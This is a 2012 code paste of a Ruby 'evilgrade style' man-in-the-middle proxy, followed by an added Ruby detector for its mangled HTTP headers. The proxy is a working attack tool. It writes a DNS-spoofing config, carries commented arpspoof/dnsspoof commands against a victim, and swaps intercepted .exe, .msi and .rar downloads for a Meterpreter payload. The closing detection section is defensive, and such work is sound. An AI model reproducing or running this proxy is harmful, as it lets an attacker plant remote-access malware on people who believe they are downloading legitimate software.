evilgrade style exploit. . . by bigmac

Oct 11th, 2012
Ruby, 4.38 KB

#sudo ruby proxy.rb port
#sudo ruby proxy.rb 666
#sudo is needed for opening a socket
require 'eventmachine' # must install eventmachine
prox_port = ARGV[0]
attacker_ip = "192.168.0.2" # local host
meterpreter = "/tmp/meterpreter" # search this script and replace /home/bigmac/tmp/meterpreter
#meterpreter.EXE meterpreter.MSI meterpreter.RAR meterpreter.ZIP
#if the meterpreter exists with the file extension the client is attempting to download then the switch will be made

dns = File.open("dns.conf", "w+")   # set up for dns spoofing domains to this proxy
dns.write("#{attacker_ip}        *.*") # this is your ip,
dns.close


#      uncomment these lines when you want to use arpspoof/dnsspoof
#victim="192.168.1.111"
#gateway="192.168.1.1"
#`pkill spoof`
#a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"}
#c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"}
#b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns.conf'"}
#a.run
#b.run
#c.run
Thread.start {
  class Client < EM::Connection
    def initialize(other, finger, *args, &blk)
      @other, @finger = other, finger
      super(*args, &blk)
    end

    def post_init
      @payload_extension = ""
      send_data @finger.sub("Accept-Encoding:", "Assept-Ensoding:") # send a get request, but disable encoding gzip
      for x in [".exe", ".rar", ".msi"] # payload format list, checking for file extension... add more of these to the list
        extension_check = @finger.scan(/#{x}/).to_s
        if extension_check.length > 1
          @payload_extension << extension_check
        end
      end
      if @payload_extension.length == 0
        @payload_extension = ""
      end
    end

    #Content-Type: application/x-msdos-program
    #Content-Type: application/x-msdownload
    #Content-Type: application/octet-stream
    #Content-Type: application/x-msihttp://www.i8igmac.tk/file.exe
    #Content-Type: application/x-rar
    #Content-Type: application/octet-stream
    #a list of possible application downloads... maybe check the GET request for jar? exe? msi? rar?

    def receive_data(response) # this is the part that the web client will see... change with evil code
      clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ", "")
      if response.scan("Content-Length: ").to_s == "Content-Length: " # if true
        if @payload_extension.length > 1 # if true
          for trigger in ["application/x-msdos-program", "application/x-msdownload", "application/octet-stream", "application/x-msi", "applictation/x-rar", "application/rar", "application/octet-stream"] # add more triggers to this list
            if response.scan("#{trigger}").to_s.length > 1 # if string is found, trigger
              if File.exists?("/tmp/meterpreter#{@payload_extension.downcase}") #= true
                puts " injecting #{@payload_extension} SUCCESS" # we need to check if the payload exists and use this extension
                payload = File.read("/tmp/meterpreter#{@payload_extension.downcase}") # if the payload does not exist then this will break the script
                headers, body = response.split("\r\n\r\n", 2)
                @other.send_data headers.gsub(clength, payload.length.to_s) + "\r\n\r\n" + payload
              else
                puts "payload does not exist? meterpreter#{@payload_extension} sending unmodified data"
              end
            end
          end # end of trigger loop
        end # end of if payload_extension.length
      end
      @other.send_data response
      # if no injection was found, send the unmodified response to the client
    end
  end

  # browser open to http://192.168.1.114
  module EchoServer
    def receive_data(finger) # finger is the header received from the client, could log these cookies or log these pages
      ping = finger.gsub(" ", "").index("Host:")
      pong = finger.gsub(" ", "").index("\n", ping)
      host = finger.gsub(" ", "")[ping..pong].gsub("Host:", "").chomp # old method for gathering the host: field... could shorten this
      # i dont know if this will prevent loading from cache
      data = finger.sub("If-None-Match:", "If-None-MutXX:").sub("If-Modified-Since:", "If-Modified-SXnce:")
      EventMachine::connect host, 80, Client, self, data # ask google for response...
    end
  end
}
EventMachine::run {
  EventMachine::start_server attacker_ip, prox_port, EchoServer # YOUR IP
}
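Added detection example (not part of bigmac's paste): the proxy above deliberately misspells the client's Accept-Encoding, If-None-Match and If-Modified-Since headers so that the origin server ignores them and returns an uncompressed, uncached body. Real browsers never emit near-misses of standard header names, so an egress proxy or IDS can flag requests whose header names are a few edits away from a known header. The constants KNOWN_HEADERS and MAX_DISTANCE, the helper names, and the two sample requests are all assumptions constructed for this illustration.

```ruby
# Added example: flag HTTP requests carrying near-miss spellings of standard
# header names, the artefact left by the header-mangling proxy above.

# Constructed allow-list of common request headers (assumption; extend as needed).
KNOWN_HEADERS = %w[
  Host User-Agent Accept Accept-Encoding Accept-Language Connection
  Cookie Referer If-None-Match If-Modified-Since Cache-Control
  Content-Length Content-Type Expect Range
].freeze

# A name is suspicious when it is within MAX_DISTANCE edits of a known header
# but is not itself known. The extra length rule (distance * 4 <= length)
# keeps very short legitimate names such as "DNT" from matching by accident.
MAX_DISTANCE = 3

# Standard Levenshtein edit distance between two strings.
def edit_distance(a, b)
  prev = (0..b.length).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cost = ca == cb ? 0 : 1
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost].min
    end
    prev = cur
  end
  prev.last
end

# Header names from a raw HTTP request: skip the request line, stop at the blank line.
def header_names(raw_request)
  lines = raw_request.split(/\r?\n/)
  lines.drop(1).take_while { |l| !l.empty? }.map { |l| l.split(":", 2).first.strip }
end

# Returns [[suspicious_name, closest_known_header], ...] for one request.
def suspicious_headers(raw_request)
  header_names(raw_request).filter_map do |name|
    next if KNOWN_HEADERS.any? { |k| k.casecmp?(name) }
    closest = KNOWN_HEADERS.min_by { |k| edit_distance(name.downcase, k.downcase) }
    dist = edit_distance(name.downcase, closest.downcase)
    [name, closest] if dist <= MAX_DISTANCE && dist * 4 <= name.length
  end
end

# Constructed sample request as the mangling proxy would forward it (not captured traffic).
MANGLED_REQUEST = [
  "GET /setup/update.exe HTTP/1.1",
  "Host: updates.example.com",
  "Assept-Ensoding: gzip, deflate",
  "If-None-MutXX: \"abc123\"",
  "If-Modified-SXnce: Mon, 01 Oct 2012 00:00:00 GMT",
  "User-Agent: Mozilla/5.0",
  "", ""
].join("\r\n")

# Constructed sample request from an ordinary browser, including non-standard but legitimate headers.
CLEAN_REQUEST = [
  "GET /setup/update.exe HTTP/1.1",
  "Host: updates.example.com",
  "Accept-Encoding: gzip, deflate",
  "If-None-Match: \"abc123\"",
  "DNT: 1",
  "Upgrade-Insecure-Requests: 1",
  "X-Requested-With: XMLHttpRequest",
  "", ""
].join("\r\n")

if __FILE__ == $0
  { "mangled" => MANGLED_REQUEST, "clean" => CLEAN_REQUEST }.each do |label, req|
    hits = suspicious_headers(req)
    puts "#{label}: #{hits.empty? ? 'no suspicious headers' : hits.map { |n, k| "#{n} (looks like #{k})" }.join(', ')}"
  end
end
```

Run against a proxy log or a pcap export, the same check is a cheap way to surface hosts whose traffic has passed through a header-tampering intermediary; the durable mitigation for the download swap itself is fetching installers over TLS and verifying a signature or pinned hash before execution.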